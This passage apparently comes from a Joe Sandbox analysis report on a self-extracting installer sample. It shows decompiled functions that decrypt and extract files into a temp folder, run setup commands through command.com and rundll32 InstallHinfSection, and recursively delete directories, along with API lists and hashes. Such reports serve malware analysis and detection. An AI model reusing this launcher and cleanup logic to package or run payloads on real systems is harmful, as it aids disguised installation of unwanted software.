                                                                                                                                                                                                        0x00211d46
                                                                                                                                                                                                        0x00211cc2
                                                                                                                                                                                                        0x00211cc2
                                                                                                                                                                                                        0x00211ccc
                                                                                                                                                                                                        0x00211cce
                                                                                                                                                                                                        0x00211cce
                                                                                                                                                                                                        0x00211cdb
                                                                                                                                                                                                        0x00211ce6
                                                                                                                                                                                                        0x00211cee
                                                                                                                                                                                                        0x00211cee
                                                                                                                                                                                                        0x00211e89
                                                                                                                                                                                                        0x00211e91
                                                                                                                                                                                                        0x00211e92
                                                                                                                                                                                                        0x00211e94
                                                                                                                                                                                                        0x00211e97
                                                                                                                                                                                                        0x00211ea4
                                                                                                                                                                                                        0x00211ea4
                                                                                                                                                                                                        0x00211c61
                                                                                                                                                                                                        0x00211c07
                                                                                                                                                                                                        0x00211bd3
                                                                                                                                                                                                        0x00211b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00211C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00211140,00000000,00000008,?), ref: 00211CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00211D1B
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2145762761
                                                                                                                                                                                                        • Opcode ID: 1e5fc37246067eba6b7f3b856114301e0e0098c523325b11a2b785683a4f057b
                                                                                                                                                                                                        • Instruction ID: 94c49e9836877d480f4b98d74d06f97dd7483851da8d357ae05bf5d0dd2fa88d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5fc37246067eba6b7f3b856114301e0e0098c523325b11a2b785683a4f057b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFA15970A242196BEB209F24DC45BEA77E99F75310F1442A5E759A32C0DFB08EF5CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 212f1d-212f3d 451 212f6c-212f73 call 215164 450->451 452 212f3f-212f46 450->452 461 213041 451->461 462 212f79-212f80 call 2155a0 451->462 453 212f48 call 2151e5 452->453 454 212f5f-212f66 call 213a3f 452->454 459 212f4d-212f4f 453->459 454->451 454->461 459->461 464 212f55-212f5d 459->464 463 213043-213053 call 216ce0 461->463 462->461 469 212f86-212fbe GetSystemDirectoryA call 21658a LoadLibraryA 462->469 464->451 464->454 472 212fc0-212fd4 GetProcAddress 469->472 473 212ff7-213004 FreeLibrary 469->473 472->473 474 212fd6-212fee DecryptFileA 472->474 475 213017-213024 SetCurrentDirectoryA 473->475 476 213006-21300c 473->476 474->473 485 212ff0-212ff5 474->485 478 213054-21305a 475->478 479 213026-21303c call 2144b9 call 216285 475->479 476->475 477 21300e call 21621e 476->477 489 213013-213015 477->489 481 213065-21306c 478->481 482 21305c call 213b26 478->482 479->461 487 21307c-213089 481->487 488 21306e-213075 call 21256d 481->488 491 213061-213063 482->491 485->473 493 2130a1-2130a9 487->493 494 21308b-213091 487->494 498 21307a 488->498 489->461 489->475 491->461 491->481 496 2130b4-2130b7 493->496 497 2130ab-2130ad 493->497 494->493 499 213093 call 213ba2 494->499 496->463 497->496 501 2130af call 214169 497->501 498->487 503 213098-21309a 499->503 501->496 503->461 505 21309c 503->505 505->493
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00212F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x218004; // 0x58ac7c6d
				_v8 = _t9 ^ _t46;
				if( *0x218a38 != 0) {
					L5:
					_t11 = E00215164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00216CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E002155A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0021658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x21a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x218a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x218a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x218d48 & 0x000000c0;
									if(( *0x218d48 & 0x000000c0) == 0) {
										_t41 =  *0x219a40; // 0x3, executed
										_t26 = E0021256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x218a24; // 0x0
									 *0x219a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x218a38;
										if( *0x218a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00214169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x219a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00213BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x218a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00213B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E002144B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x219124 = E00216285();
							goto L16;
						}
						_t59 =  *0x219a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0021621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x218a24;
				if( *0x218a24 != 0) {
					L4:
					_t34 = E00213A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E002151E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x218a38;
				if( *0x218a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                        0x00212f1d
                                                                                                                                                                                                        0x00212f28
                                                                                                                                                                                                        0x00212f2f
                                                                                                                                                                                                        0x00212f3d
                                                                                                                                                                                                        0x00212f6c
                                                                                                                                                                                                        0x00212f6c
                                                                                                                                                                                                        0x00212f71
                                                                                                                                                                                                        0x00212f73
                                                                                                                                                                                                        0x00213041
                                                                                                                                                                                                        0x00213041
                                                                                                                                                                                                        0x00213043
                                                                                                                                                                                                        0x00213053
                                                                                                                                                                                                        0x00213053
                                                                                                                                                                                                        0x00212f79
                                                                                                                                                                                                        0x00212f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f86
                                                                                                                                                                                                        0x00212f86
                                                                                                                                                                                                        0x00212f93
                                                                                                                                                                                                        0x00212f9e
                                                                                                                                                                                                        0x00212fa0
                                                                                                                                                                                                        0x00212fa6
                                                                                                                                                                                                        0x00212fb8
                                                                                                                                                                                                        0x00212fba
                                                                                                                                                                                                        0x00212fbe
                                                                                                                                                                                                        0x00212fc6
                                                                                                                                                                                                        0x00212fcc
                                                                                                                                                                                                        0x00212fd4
                                                                                                                                                                                                        0x00212fd6
                                                                                                                                                                                                        0x00212fd8
                                                                                                                                                                                                        0x00212fe0
                                                                                                                                                                                                        0x00212fe6
                                                                                                                                                                                                        0x00212fee
                                                                                                                                                                                                        0x00212ff0
                                                                                                                                                                                                        0x00212ff5
                                                                                                                                                                                                        0x00212ff5
                                                                                                                                                                                                        0x00212fee
                                                                                                                                                                                                        0x00212fd4
                                                                                                                                                                                                        0x00212ff8
                                                                                                                                                                                                        0x00212ffe
                                                                                                                                                                                                        0x00213004
                                                                                                                                                                                                        0x00213017
                                                                                                                                                                                                        0x0021301c
                                                                                                                                                                                                        0x00213024
                                                                                                                                                                                                        0x00213054
                                                                                                                                                                                                        0x0021305a
                                                                                                                                                                                                        0x00213065
                                                                                                                                                                                                        0x00213065
                                                                                                                                                                                                        0x0021306c
                                                                                                                                                                                                        0x0021306e
                                                                                                                                                                                                        0x00213075
                                                                                                                                                                                                        0x0021307a
                                                                                                                                                                                                        0x0021307a
                                                                                                                                                                                                        0x0021307c
                                                                                                                                                                                                        0x00213081
                                                                                                                                                                                                        0x00213087
                                                                                                                                                                                                        0x00213089
                                                                                                                                                                                                        0x002130a1
                                                                                                                                                                                                        0x002130a1
                                                                                                                                                                                                        0x002130a9
                                                                                                                                                                                                        0x002130ab
                                                                                                                                                                                                        0x002130ad
                                                                                                                                                                                                        0x002130af
                                                                                                                                                                                                        0x002130af
                                                                                                                                                                                                        0x002130ad
                                                                                                                                                                                                        0x002130b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021308b
                                                                                                                                                                                                        0x0021308b
                                                                                                                                                                                                        0x00213091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213093
                                                                                                                                                                                                        0x00213098
                                                                                                                                                                                                        0x0021309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021309c
                                                                                                                                                                                                        0x00213089
                                                                                                                                                                                                        0x0021305c
                                                                                                                                                                                                        0x00213061
                                                                                                                                                                                                        0x00213063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213063
                                                                                                                                                                                                        0x0021302b
                                                                                                                                                                                                        0x00213032
                                                                                                                                                                                                        0x0021303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021303c
                                                                                                                                                                                                        0x00213006
                                                                                                                                                                                                        0x0021300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021300e
                                                                                                                                                                                                        0x00213015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213015
                                                                                                                                                                                                        0x00212f80
                                                                                                                                                                                                        0x00212f3f
                                                                                                                                                                                                        0x00212f46
                                                                                                                                                                                                        0x00212f5f
                                                                                                                                                                                                        0x00212f5f
                                                                                                                                                                                                        0x00212f64
                                                                                                                                                                                                        0x00212f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f66
                                                                                                                                                                                                        0x00212f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f55
                                                                                                                                                                                                        0x00212f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00212FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00212FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00212FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00212FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021301C
                                                                                                                                                                                                          • Part of subcall function 002151E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F4D,?,00000002,00000000), ref: 00215201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-4070797333
                                                                                                                                                                                                        • Opcode ID: 8f50ac37dfe87e0a83d4abffe0d476bf4b115f93586193a1f53c7c5c54145581
                                                                                                                                                                                                        • Instruction ID: e426870538efdaed9eb8d400fb3ada8419a80368c64d99463bd5cc49c5bc5c57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f50ac37dfe87e0a83d4abffe0d476bf4b115f93586193a1f53c7c5c54145581
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7417E31A202169BDB30EF71AC8D7EA32EA9B78750F104065E945C2591EF748EE48A61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00212390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x218004; // 0x58ac7c6d
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00216CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00211680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E002116B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00211680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E002116B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E002116B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0021658A( &_v280, 0x104, 0x211140);
								E00212390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                        0x00212398
                                                                                                                                                                                                        0x0021239e
                                                                                                                                                                                                        0x002123a3
                                                                                                                                                                                                        0x002123a5
                                                                                                                                                                                                        0x002123ae
                                                                                                                                                                                                        0x002123b3
                                                                                                                                                                                                        0x002124cb
                                                                                                                                                                                                        0x002124d2
                                                                                                                                                                                                        0x002124d3
                                                                                                                                                                                                        0x002124d4
                                                                                                                                                                                                        0x002124df
                                                                                                                                                                                                        0x002123c2
                                                                                                                                                                                                        0x002123d1
                                                                                                                                                                                                        0x002123db
                                                                                                                                                                                                        0x002123e4
                                                                                                                                                                                                        0x002123f6
                                                                                                                                                                                                        0x002123fc
                                                                                                                                                                                                        0x00212401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212407
                                                                                                                                                                                                        0x00212407
                                                                                                                                                                                                        0x00212408
                                                                                                                                                                                                        0x00212411
                                                                                                                                                                                                        0x0021241f
                                                                                                                                                                                                        0x0021247a
                                                                                                                                                                                                        0x00212483
                                                                                                                                                                                                        0x00212495
                                                                                                                                                                                                        0x002124a3
                                                                                                                                                                                                        0x00212421
                                                                                                                                                                                                        0x0021242f
                                                                                                                                                                                                        0x00212453
                                                                                                                                                                                                        0x0021245d
                                                                                                                                                                                                        0x00212466
                                                                                                                                                                                                        0x00212472
                                                                                                                                                                                                        0x00212472
                                                                                                                                                                                                        0x0021242f
                                                                                                                                                                                                        0x002124af
                                                                                                                                                                                                        0x002124b5
                                                                                                                                                                                                        0x002124be
                                                                                                                                                                                                        0x002124c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002124c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00218A3A,002111F4,00218A3A,00000000,?,?), ref: 002123F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,002111F8), ref: 00212427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,002111FC), ref: 0021243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00212495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002124A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 002124AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 002124BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00218A3A), ref: 002124C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: cadb99bbc3956a6af0b2ca80f8a9139379c9145de73a3f7055a8cf283210be9a
                                                                                                                                                                                                        • Instruction ID: 03823a75d69d222820f7c5b7d495eb612c8f16ce144b8ee216458a4055856016
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cadb99bbc3956a6af0b2ca80f8a9139379c9145de73a3f7055a8cf283210be9a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7131A631214745EBC320DF64DC8DAEB73ECABE5305F04492DB55982190EF3499ADCB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00212BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x21a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x219124 = 0;
				if(E00212CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00212F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E002152B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x218a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x219a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00211F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x218588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x219124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                        0x00212c03
                                                                                                                                                                                                        0x00212c0d
                                                                                                                                                                                                        0x00212c18
                                                                                                                                                                                                        0x00212c20
                                                                                                                                                                                                        0x00212c2e
                                                                                                                                                                                                        0x00212c32
                                                                                                                                                                                                        0x00212c36
                                                                                                                                                                                                        0x00212c3d
                                                                                                                                                                                                        0x00212c43
                                                                                                                                                                                                        0x00212c45
                                                                                                                                                                                                        0x00212c47
                                                                                                                                                                                                        0x00212c49
                                                                                                                                                                                                        0x00212c4e
                                                                                                                                                                                                        0x00212c4e
                                                                                                                                                                                                        0x00212c47
                                                                                                                                                                                                        0x00212c32
                                                                                                                                                                                                        0x00212c20
                                                                                                                                                                                                        0x00212c50
                                                                                                                                                                                                        0x00212c54
                                                                                                                                                                                                        0x00212c57
                                                                                                                                                                                                        0x00212c64
                                                                                                                                                                                                        0x00212c66
                                                                                                                                                                                                        0x00212c6b
                                                                                                                                                                                                        0x00212c6d
                                                                                                                                                                                                        0x00212c74
                                                                                                                                                                                                        0x00212c76
                                                                                                                                                                                                        0x00212c7c
                                                                                                                                                                                                        0x00212c7e
                                                                                                                                                                                                        0x00212c87
                                                                                                                                                                                                        0x00212c89
                                                                                                                                                                                                        0x00212c89
                                                                                                                                                                                                        0x00212c87
                                                                                                                                                                                                        0x00212c7c
                                                                                                                                                                                                        0x00212c74
                                                                                                                                                                                                        0x00212c8e
                                                                                                                                                                                                        0x00212c95
                                                                                                                                                                                                        0x00212c98
                                                                                                                                                                                                        0x00212c98
                                                                                                                                                                                                        0x00212c9e
                                                                                                                                                                                                        0x00212ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00212C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 86e362c6251cc61783fef7eae130117d3a5f35cb54fce8e8a2dd050ef42f4c65
                                                                                                                                                                                                        • Instruction ID: cdfd129ee01ba4b3993bb516c23fbe0a1ff49b81e4b4594e9b3113b173c99985
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86e362c6251cc61783fef7eae130117d3a5f35cb54fce8e8a2dd050ef42f4c65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E119431621216EBD7206F75BC9DAEA37DD9B78750B064026BA04D3250DE30DCF98A91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216F40() {

				SetUnhandledExceptionFilter(E00216EF0); // executed
				return 0;
			}



                                                                                                                                                                                                        0x00216f45
                                                                                                                                                                                                        0x00216f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00216F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
